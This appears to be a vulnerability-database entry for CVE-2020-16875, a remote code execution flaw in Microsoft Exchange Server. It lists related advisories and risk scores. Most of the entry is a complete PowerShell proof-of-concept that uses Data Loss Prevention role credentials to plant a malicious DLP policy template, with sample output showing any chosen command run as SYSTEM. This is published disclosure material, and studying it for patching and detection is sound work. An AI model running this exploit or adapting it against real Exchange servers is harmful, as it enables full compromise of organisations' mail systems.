SRC-2020-0019 : Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability

🗓️ 22 May 2020 00:00:00Reported by Steven Seeley (mr_me) of Qihoo 360 Vulcan TeamType

Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability. Remote code execution on affected installations of Exchange Server

Reporter	Title	Published	Views	Family All 39
0day.today	Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Exploit	17 Sep 202000:00	–	zdt
ATTACKERKB	CVE-2020-17132	10 Dec 202000:00	–	attackerkb
ATTACKERKB	CVE-2020-16875	11 Sep 202000:00	–	attackerkb
ATTACKERKB	CVE-2021-24085	25 Feb 202100:00	–	attackerkb
Information Security Automation	Microsoft Patch Tuesday September 2020: Zerologon and other exploits, RCEs in SharePoint and Exchange	30 Sep 202023:46	–	avleonov
Circl	CVE-2020-16875	16 Sep 202020:41	–	circl
CNVD	Microsoft Exchange Server Remote Code Execution Vulnerability (CNVD-2021-01044)	9 Sep 202000:00	–	cnvd
Check Point Advisories	Microsoft Exchange Memory Corruption (CVE-2020-16875)	21 Sep 202000:00	–	checkpoint_advisories
CVE	CVE-2020-16875	11 Sep 202017:08	–	cve
Cvelist	CVE-2020-16875 Microsoft Exchange Server Remote Code Execution Vulnerability	11 Sep 202017:08	–	cvelist

# Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability
# Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875
#
# Notes:
#
# The (ab)user needs the "Data Loss Prevention" role assigned
# [PS] C:\Windows\system32>New-RoleGroup -Name "dlp users" -Roles "Data Loss Prevention" -Members "harrym"
# 
# Name      AssignedRoles          RoleAssignments                  ManagedBy
# ----      -------------          ---------------                  ---------
# dlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
# 
# 
# [PS] C:\Windows\system32>Get-RoleGroup "dlp users" | Format-List
# 
# RunspaceId                  : 098e1140-30e3-4144-8028-2174fdb43b85
# ManagedBy                   : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
# RoleAssignments             : {Data Loss Prevention-dlp users}
# Roles                       : {Data Loss Prevention}
# DisplayName                 :
# ExternalDirectoryObjectId   :
# Members                     : {exchangedemo.com/Users/Harry Mull}
# SamAccountName              : dlp users
# Description                 :
# RoleGroupType               : Standard
# LinkedGroup                 :
# Capabilities                : {}
# LinkedPartnerGroupId        :
# LinkedPartnerOrganizationId :
# Identity                    : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# IsValid                     : True
# ExchangeVersion             : 0.10 (14.0.100.0)
# Name                        : dlp users
# DistinguishedName           : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com
# Guid                        : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6
# ObjectCategory              : exchangedemo.com/Configuration/Schema/Group
# ObjectClass                 : {top, group}
# WhenChanged                 : 6/12/2020 11:29:31 PM
# WhenCreated                 : 6/12/2020 11:29:31 PM
# WhenChangedUTC              : 6/12/2020 3:29:31 PM
# WhenCreatedUTC              : 6/12/2020 3:29:31 PM
# OrganizationId              :
# Id                          : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# OriginatingServer           : DEAD01.exchangedemo.com
# ObjectState                 : Changed
#
# Example:
#
# PS C:\Users\researcher> .\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr [email protected] -pwd user123### -cmd mspaint
# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with [email protected]:user123###
# (+) executed mspaint as SYSTEM!
# PS C:\Users\researcher>

param (
    [Parameter(Mandatory=$true)][string]$server,
    [Parameter(Mandatory=$true)][string]$usr,
    [Parameter(Mandatory=$true)][string]$pwd,
    [string]$cmd = "mspaint"
)

Function Get-RandomAlphanumericString {
    [CmdletBinding()]
    Param (
        [int] $length = 8
    )
    Process{
        Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length  | % {[char]$_}) )
    }	
}

function Exploit-Exchange {
    Param (
        [string] $server,
        [string] $usr,
        [string] $pwd,
        [string] $cmd
    )
    "(+) targeting $server with ${usr}:$pwd"
    $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)
    $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds

    $xml = @"4si<![CDATA[ `$i=New-object System.Diagnostics.ProcessStartInfo;`$i.UseShellExecute=`$true;`$i.FileName="cmd";`$i.Arguments="/c $cmd";`$r=New-Object System.Diagnostics.Process;`$r.StartInfo=`$i;`$r.Start() ]]>"@

    $n = Get-RandomAlphanumericString
    [Byte[]]$d = [System.Text.Encoding]::UTF8.GetBytes($xml)
    Invoke-Command -Session $s -ScriptBlock {
        New-DlpPolicy -Name $Using:n -TemplateData $Using:d 
    } | Out-Null
    "(+) executed $cmd as SYSTEM!"	
}

Get-PSSession | Remove-PSSession
Exploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd

08 Sep 2020 00:00Current

7.8High risk

Vulners AI Score7.8

CVSS 3.17.2 - 8.4

CVSS 29

EPSS0.86816